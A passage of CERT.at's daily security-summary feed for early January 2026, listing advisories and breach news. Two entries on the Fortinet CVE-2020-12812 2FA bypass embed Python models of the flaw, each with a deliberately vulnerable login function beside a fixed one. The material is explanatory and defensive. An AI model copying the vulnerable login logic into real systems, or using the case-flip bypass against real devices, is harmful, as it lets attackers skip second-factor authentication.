&lt;h3&gt;Cisco Identity Services Engine XML External Entity Processing Information Disclosure Vulnerability&lt;/h3&gt;

A vulnerability in the licensing features of Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker with administrative privileges to gain access to sensitive information. This vulnerability is due to improper parsing of XML that is processed by the web-based management interface of Cisco ISE and Cisco ISE-PIC. An attacker could exploit this vulnerability by uploading a malicious file to ..
&lt;p /&gt;
&lt;A HREF=&quot;https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-xxe-jWSbSDKt&quot;&gt;https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-xxe-jWSbSDKt&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities&lt;/h3&gt;

Multiple Cisco products are affected by vulnerabilities in the processing of Distributed Computing Environment Remote Procedure Call (DCE/RPC) requests that could allow an unauthenticated, remote attacker to cause the Snort 3 Detection Engine to leak sensitive information or to restart, which would result in an interruption of packet inspection. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address ..
&lt;p /&gt;
&lt;A HREF=&quot;https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort3-dcerpc-vulns-J9HNF4tH&quot;&gt;https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort3-dcerpc-vulns-J9HNF4tH&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;[20260101] - Core - Inadequate content filtering for data URLs&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://developer.joomla.org/security-centre/1016-20260101-core-inadequate-content-filtering-for-data-urls.html&quot;&gt;https://developer.joomla.org/security-centre/1016-20260101-core-inadequate-content-filtering-for-data-urls.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;[20260102] - Core - XSS vector in the pagebreak plugin&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://developer.joomla.org/security-centre/1017-20260102-core-xss-vector-in-the-pagebreak-plugin.html&quot;&gt;https://developer.joomla.org/security-centre/1017-20260102-core-xss-vector-in-the-pagebreak-plugin.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;[20260102] - Core - XSS vectors in the pagebreak and pagenavigation plugins&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://developer.joomla.org/security-centre/1017-20260102-core-xss-vector-in-the-pagebreak-plugin.html&quot;&gt;https://developer.joomla.org/security-centre/1017-20260102-core-xss-vector-in-the-pagebreak-plugin.html&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-07T18:14:42Z</dc:date></entry><entry><title>Tageszusammenfassung - 05.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-05012026"/><author><name>CERT.at</name></author><updated>2026-01-05T18:06:37Z</updated><published>2026-01-05T18:06:37Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Friday 02-01-2026 18:00 - Monday 05-01-2026 18:00
Handler:     Alexander Riepl
Co-Handler:  n/a


&lt;h2&gt;      News       &lt;/h2&gt;



&lt;h3&gt;Hackers claim to hack Resecurity, firm says it was a honeypot&lt;/h3&gt;

The ShinyHunters hacking group claims it breached the systems of cybersecurity firm Resecurity and stole internal data, while Resecurity says the attackers only accessed a deliberately deployed honeypot containing fake information used to monitor their activity.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/hackers-claim-resecurity-hack-firm-says-it-was-a-honeypot/&quot;&gt;https://www.bleepingcomputer.com/news/security/hackers-claim-resecurity-hack-firm-says-it-was-a-honeypot/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;How to Protect Your iPhone or Android Device From Spyware&lt;/h3&gt;

Being targeted by sophisticated spyware is relatively rare, but experts say that everyone needs to stay vigilant as this dangerous malware continues to proliferate worldwide.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.wired.com/story/how-to-protect-your-iphone-or-android-device-from-spyware/&quot;&gt;https://www.wired.com/story/how-to-protect-your-iphone-or-android-device-from-spyware/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Plex Media Server: still-unpatched access vulnerabilities&lt;/h3&gt;

Plex Media Server has security holes through which attackers can gain unauthorized access. Updates are still pending.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Plex-Media-Server-Noch-ungepatchte-Zugriffsschwachstellen-11128582.html&quot;&gt;https://www.heise.de/news/Plex-Media-Server-Noch-ungepatchte-Zugriffsschwachstellen-11128582.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;MongoBleed scanner for admins&lt;/h3&gt;

Many MongoDB instances are or were potentially vulnerable to MongoBleed. A tool helps analyze servers for traces of attacks.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/MongoBleed-Scanner-fuer-Admins-11129291.html&quot;&gt;https://www.heise.de/news/MongoBleed-Scanner-fuer-Admins-11129291.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Taiwan: 2.6 million Chinese cyberattacks per day&lt;/h3&gt;

According to Taiwan, the attacks took place in close temporal proximity to military exercises. China denies this.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.derstandard.at/story/3000000302832/taiwan-26-millionen-cyberangriffe-chinas-pro-tag&quot;&gt;https://www.derstandard.at/story/3000000302832/taiwan-26-millionen-cyberangriffe-chinas-pro-tag&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Ongoing attacks against an old vulnerability in Fortinet devices (CVE-2020-12812)&lt;/h3&gt;

A vulnerability in Fortinet firewalls that has been known since July 2020, CVE-2020-12812, is currently being actively exploited. By exploiting the flaw, attackers can bypass two-factor authentication (2FA) via FortiToken through a simple manipulation of upper and lower case in the username (e.g. &quot;Mmueller&quot; instead of &quot;mmueller&quot;). Particularly at risk are systems that authenticate local users via a ..
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cert.at/de/aktuelles/2026/1/aktuelle-angriffe-gegen-alte-sicherheitslucke-in-fortinet-geraten-cve-2020-12812&quot;&gt;https://www.cert.at/de/aktuelles/2026/1/aktuelle-angriffe-gegen-alte-sicherheitslucke-in-fortinet-geraten-cve-2020-12812&lt;/a&gt;
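The bug class behind this bypass is two authentication backends that disagree on how a username is compared: one store matches the exact string and carries the second-factor requirement, the other matches case-insensitively and has no token policy, so a case-flipped username falls through to the weaker path. The following Python is an added example written for this digest, a deliberately simplified model and not FortiOS code or Fortinet's fix; the user record, password and the use of a plain SHA-256 hash in place of a real credential store are all constructed for illustration. The hardened variant canonicalises the username once, before any backend is consulted, which is what Fortinet's documented workaround of disabling username case sensitivity amounts to.

```python
import hashlib
import hmac

# Simplified model of the CVE-2020-12812 bug class. Illustrative only: this is
# not FortiOS logic, and SHA-256 stands in for a real password store. All
# accounts and secrets below are constructed for the example.


def _hash(password):
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


# Local user store: exact, case-sensitive match; this is where the
# FortiToken-style second-factor requirement is attached.
LOCAL_USERS = {
    "mmueller": {"pw": _hash("Winter2026!"), "totp_required": True},
}

# Remote directory (think LDAP): matches usernames case-insensitively and has
# no notion of the token policy. The same password is valid here because the
# local account mirrors the directory account.
REMOTE_USERS = {"mmueller": _hash("Winter2026!")}


def remote_auth(username, password):
    """Password-only check against the case-insensitive directory."""
    stored = REMOTE_USERS.get(username.lower())
    return stored is not None and hmac.compare_digest(stored, _hash(password))


def _check_local(record, password, totp_ok):
    """Password plus, if the record demands it, the second factor."""
    if not hmac.compare_digest(record["pw"], _hash(password)):
        return False
    return totp_ok if record["totp_required"] else True


def authenticate_vulnerable(username, password, totp_ok):
    """Local lookup is case-sensitive; a miss falls through to the remote
    directory, which never enforces the second factor. 'Mmueller' with the
    right password therefore logs in without any token."""
    local = LOCAL_USERS.get(username)
    if local is not None:
        return _check_local(local, password, totp_ok)
    return remote_auth(username, password)


def authenticate_fixed(username, password, totp_ok):
    """Canonicalise the username once and decide the second-factor policy on
    the canonical identity before any backend is consulted, so every spelling
    of the name hits the same policy."""
    canonical = username.lower()
    local = LOCAL_USERS.get(canonical)
    if local is not None:
        return _check_local(local, password, totp_ok)
    return remote_auth(canonical, password)


if __name__ == "__main__":
    print("vulnerable, case-flipped, no token:",
          authenticate_vulnerable("Mmueller", "Winter2026!", totp_ok=False))
    print("fixed, case-flipped, no token:",
          authenticate_fixed("Mmueller", "Winter2026!", totp_ok=False))
```

The general lesson is not specific to Fortinet: whenever an identity is looked up in more than one place, the normalisation (case folding, Unicode form, trailing whitespace, domain suffix) has to be applied once, up front, and the strongest policy found for that canonical identity has to win, rather than whichever backend happens to match first.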

&lt;hr&gt;

&lt;h3&gt;Nearly 480,000 impacted by Covenant Health data breach&lt;/h3&gt;

A cyberattack last year against the Catholic healthcare organization Covenant Health exposed the sensitive information of more than 478,000 people.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/covenant-health-breach-qilin&quot;&gt;https://therecord.media/covenant-health-breach-qilin&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;NordVPN Denies Breach After Hacker Claims Access to Salesforce Dev Data&lt;/h3&gt;

A hacker using the alias 1011 has claimed to breach a NordVPN development server, posting what appears to-
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/nordvpn-denies-breach-hacker-salesforce-dev-data/&quot;&gt;https://hackread.com/nordvpn-denies-breach-hacker-salesforce-dev-data/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Setback for software maker: BSI may criticize a security concept as &quot;conspicuous&quot;&lt;/h3&gt;

The Cologne Administrative Court rejected a manufacturer's urgent application against an impending official warning and strengthened the BSI's powers to inform the public.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11127661&quot;&gt;https://heise.de/-11127661&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates: various attacks on QNAP NAS possible&lt;/h3&gt;

Given the right preconditions, attackers can attack QNAP network storage devices with far-reaching consequences.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11129647&quot;&gt;https://heise.de/-11129647&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;The Kimwolf Botnet is Stalking Your Local Network&lt;/h3&gt;

The story you are reading is a series of scoops nestled inside a far more urgent Internet-wide security advisory. The vulnerability at issue has been exploited for months already, and it's time for a broader awareness of the threat. The short version is that everything you thought you knew about the security of the internal network behind your Internet router probably is now dangerously out of date.
&lt;p /&gt;
&lt;A HREF=&quot;https://krebsonsecurity.com/2026/01/the-kimwolf-botnet-is-stalking-your-local-network/&quot;&gt;https://krebsonsecurity.com/2026/01/the-kimwolf-botnet-is-stalking-your-local-network/&lt;/a&gt;

&lt;hr&gt;


&lt;h2&gt; Vulnerabilities &lt;/h2&gt;



&lt;h3&gt;Security updates for Monday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (tar), Debian (curl and gimp), Fedora (doctl, gitleaks, gnupg2, grpcurl, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, and usd), Mageia (cups), Red Hat (container-tools:rhel8, go-toolset:rhel8, grafana, and skopeo), and SUSE (dirmngr, fluidsynth, gnu-recutils, libmatio-devel, python311-marshmallow, python312-Django6, rsync, and thunderbird).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1052795/&quot;&gt;https://lwn.net/Articles/1052795/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-05T18:06:37Z</dc:date></entry><entry><title>Tageszusammenfassung - 02.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-02012026"/><author><name>CERT.at</name></author><updated>2026-01-02T18:22:02Z</updated><published>2026-01-02T18:22:02Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Dienstag 30-12-2025 18:00 - Freitag 02-01-2026 18:00
Handler:     Michael Schlagenhaufer
Co-Handler:  Alexander Riepl


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Over 10K Fortinet firewalls exposed to actively exploited 2FA bypass&lt;/h3&gt;

Fortinet released FortiOS versions 6.4.1, 6.2.4, and 6.0.10 in July 2020 to address this flaw (tracked as CVE-2020-12812) and advised admins who couldn't immediately patch to turn off username-case-sensitivity to block 2FA bypass attempts targeting their devices. [..] On Friday, Internet security watchdog Shadowserver revealed that it currently tracks over 10,000 Fortinet firewalls still exposed on the Internet that are unpatched against CVE-2020-12812 and vulnerable to these ongoing attacks ...
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/over-10-000-fortinet-firewalls-exposed-to-ongoing-2fa-bypass-attacks/&quot;&gt;https://www.bleepingcomputer.com/news/security/over-10-000-fortinet-firewalls-exposed-to-ongoing-2fa-bypass-attacks/&lt;/a&gt;
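The case-handling flaw behind this bypass is easiest to see in code. The following is an added illustrative model, not FortiOS code and not taken from the article: it assumes a password backend that matches usernames case-insensitively (as an AD/LDAP directory typically does) while the second-factor enrolment table is keyed on the exact string the client sent, so a username submitted with changed case passes the password check, finds no token enrolment and is waved through as a user without 2FA. The user names, the sample directory and the stand-in OTP function are all constructed for the example. The fixed variant canonicalises the username once with casefold(), uses that one key for every lookup, and fails closed when no enrolment is found.

```python
"""Illustrative model of a 2FA bypass from inconsistent username handling.

Added example, not FortiOS code. Assumed (not from the page): the password
backend matches usernames case-insensitively, as an AD/LDAP directory
typically does, while the second-factor enrolment table is keyed on the
exact string the client sent.
"""
import hashlib
import hmac

# Constructed sample directory: canonical (lowercase) usernames mapped to
# salted password hashes. A real deployment would use a proper password KDF.
_SALT = b"example-salt"
_PASSWORDS = {
    "alice": hashlib.sha256(_SALT + b"correct horse").hexdigest(),
}
# Constructed second-factor enrolment, keyed on the stored username.
_TOKENS = {"alice": "FTK0000001"}


def _expected_otp(token_serial):
    """Stand-in for a real TOTP/HOTP computation, derived from the serial."""
    return hashlib.sha256(token_serial.encode()).hexdigest()[:6]


def _password_ok(username, password):
    """Backend check: the directory matches usernames case-insensitively."""
    stored = _PASSWORDS.get(username.casefold())
    if stored is None:
        return False
    digest = hashlib.sha256(_SALT + password.encode()).hexdigest()
    return hmac.compare_digest(stored, digest)


def login_vulnerable(username, password, otp=None):
    """Bug: the token lookup uses the raw username while the password check
    does not, so 'Alice' passes the password step, finds no enrolment for
    the exact string 'Alice', and is treated as a user without 2FA."""
    if not _password_ok(username, password):
        return "denied"
    token_serial = _TOKENS.get(username)        # exact-case lookup
    if token_serial is None:
        return "ok-no-2fa"                      # second factor skipped
    if otp == _expected_otp(token_serial):
        return "ok-2fa"
    return "denied"


def login_fixed(username, password, otp=None):
    """Fix: canonicalise once, use that key for every lookup, and fail
    closed when a user has no enrolment instead of skipping the factor."""
    user = username.casefold()
    if not _password_ok(user, password):
        return "denied"
    token_serial = _TOKENS.get(user)
    if token_serial is None:
        return "denied"                         # 2FA is mandatory here
    if otp == _expected_otp(token_serial):
        return "ok-2fa"
    return "denied"


def demo():
    """An attacker who knows alice's password but not her token."""
    good_otp = _expected_otp(_TOKENS["alice"])
    return {
        "exact_case_vulnerable": login_vulnerable("alice", "correct horse"),
        "mixed_case_vulnerable": login_vulnerable("Alice", "correct horse"),
        "mixed_case_fixed": login_fixed("Alice", "correct horse"),
        "mixed_case_fixed_with_otp": login_fixed("Alice", "correct horse", good_otp),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case}: {result}")
```

The vulnerable path only fails for the attacker when the username is typed exactly as stored; with "Alice" the password step still succeeds and the token step is silently skipped. Making the FortiOS username comparison case-insensitive, as the article's workaround suggests, presumably has the same effect as the canonicalisation step here: both lookups then agree on who the user is. The fail-closed branch is the second layer: a user for whom no second factor can be found should not be logged in without one.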

&lt;hr&gt;

&lt;h3&gt;The Kimwolf Botnet is Stalking Your Local Network&lt;/h3&gt;

The story you are reading is a series of scoops nestled inside a far more urgent Internet-wide security advisory. The vulnerability at issue has been exploited for months already, and it's time for a broader awareness of the threat. The short version is that everything you thought you knew about the security of the internal network behind your Internet router probably is now dangerously out of date.
&lt;p /&gt;
&lt;A HREF=&quot;https://krebsonsecurity.com/2026/01/the-kimwolf-botnet-is-stalking-your-local-network/&quot;&gt;https://krebsonsecurity.com/2026/01/the-kimwolf-botnet-is-stalking-your-local-network/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Everest Ransomware Leaks 1TB of Stolen ASUS Data&lt;/h3&gt;

On December 2, 2025, Hackread.com exclusively reported that the Everest ransomware group claimed to have stolen 1TB of sensitive ASUS data, including information related to the company's AI models, memory dumps, and calibration files. [..] Everest has now leaked the entire dataset online.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/everest-ransomware-asus-data-leak/&quot;&gt;https://hackread.com/everest-ransomware-asus-data-leak/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;RondoDox botnet exploits React2Shell flaw to breach Next.js servers&lt;/h3&gt;

The RondoDox botnet has been observed exploiting the critical React2Shell flaw (CVE-2025-55182) to infect vulnerable Next.js servers with malware and cryptominers.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/rondodox-botnet-exploits-react2shell-flaw-to-breach-nextjs-servers/&quot;&gt;https://www.bleepingcomputer.com/news/security/rondodox-botnet-exploits-react2shell-flaw-to-breach-nextjs-servers/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;The biggest cybersecurity and cyberattack stories of 2025&lt;/h3&gt;

2025 was a big year for cybersecurity, with cyberattacks, data breaches, threat groups reaching new notoriety levels, and, of course, zero-day flaws exploited in breaches. Some stories, though, were more impactful or popular with our readers than others. This article explores 15 of the biggest cybersecurity stories of 2025.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/the-biggest-cybersecurity-and-cyberattack-stories-of-2025/&quot;&gt;https://www.bleepingcomputer.com/news/security/the-biggest-cybersecurity-and-cyberattack-stories-of-2025/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hong Kong's newest anti-scam technology is over-the-counter banking&lt;/h3&gt;

Hong Kong's banks have a new weapon against scams: Accounts that require customers to visit a branch to access their funds.
&lt;p /&gt;
&lt;A HREF=&quot;https://go.theregister.com/feed/www.theregister.com/2025/12/31/hong_kong_antiscam_money_safe/&quot;&gt;https://go.theregister.com/feed/www.theregister.com/2025/12/31/hong_kong_antiscam_money_safe/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;How AI made scams more convincing in 2025&lt;/h3&gt;

Several AI-related stories in 2025 highlighted how quickly AI systems can move beyond meaningful human control.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.malwarebytes.com/blog/news/2026/01/how-ai-made-scams-more-convincing-in-2025&quot;&gt;https://www.malwarebytes.com/blog/news/2026/01/how-ai-made-scams-more-convincing-in-2025&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;VVS Discord Stealer Using Pyarmor for Obfuscation and Detection Evasion&lt;/h3&gt;

Discord is a social messaging and communications platform that has become a popular target for malware, like VVS stealer. VVS stealer is designed to steal a victim's Discord information and browser data. [..] The stealer also achieves persistence by automatically installing itself on startup. It operates stealthily by displaying fake error messages and capturing screenshots.
&lt;p /&gt;
&lt;A HREF=&quot;https://unit42.paloaltonetworks.com/vvs-stealer/&quot;&gt;https://unit42.paloaltonetworks.com/vvs-stealer/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Snipping the Long Tail of Shai-Hulud 2.0&lt;/h3&gt;

Wiz Research reveals the data behind Shai-Hulud 2.0's long tail, the massive gap in cloud credential rotation, a potential link to the Trust Wallet incident, and how we finally &quot;snipped the tail&quot; on a month of ongoing infections.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.wiz.io/blog/snipping-the-long-tail-of-shai-hulud-2-0&quot;&gt;https://www.wiz.io/blog/snipping-the-long-tail-of-shai-hulud-2-0&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;RMM Abuse in a Crypto Wallet Distribution Campaign&lt;/h3&gt;

A professionally written announcement email titled &quot;Eternl Desktop Is Live - Secure Execution for Atrium &amp; Diffusion Participants&quot; is currently circulating within the Cardano community. [..] This campaign exhibits multiple overlapping indicators consistent with supply-chain abuse and trojanized wallet distribution, combined with pre-positioning techniques that leverage RMM tools to establish persistent access.
&lt;p /&gt;
&lt;A HREF=&quot;https://malwr-analysis.com/2025/12/31/rmm-abuse-in-a-crypto-wallet-distribution-campaign/&quot;&gt;https://malwr-analysis.com/2025/12/31/rmm-abuse-in-a-crypto-wallet-distribution-campaign/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Gambio: Important Security Update 2025-12 v1.0.0 for all versions up to GX5 v5.0.1.0&lt;/h3&gt;

We have just released a new security update package, which we urgently recommend that all shop operators install. Important: users of the Gambio Cloud need not take any action; all shops have already been fully secured by us! [..] Please understand that we will not describe any details that could serve attackers as a blueprint for an attack.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.gambio.de/forum/threads/wichtiges-security-update-2025-12-v1-0-0-fuer-alle-versionen-bis-gx5-v5-0-1-0.52593/&quot;&gt;https://www.gambio.de/forum/threads/wichtiges-security-update-2025-12-v1-0-0-fuer-alle-versionen-bis-gx5-v5-0-1-0.52593/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;QNAP Security Advisories, 3 Jan&lt;/h3&gt;

QNAP has released 7 new security advisories.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.qnap.com/en-us/security-advisories&quot;&gt;https://www.qnap.com/en-us/security-advisories&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates for Friday&lt;/h3&gt;

Security updates have been issued by Debian (smb4k), Fedora (direwolf, gh, usd, and webkitgtk), Slackware (libpcap and seamonkey), and SUSE (kepler).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1052600/&quot;&gt;https://lwn.net/Articles/1052600/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-02T18:22:02Z</dc:date></entry></feed>
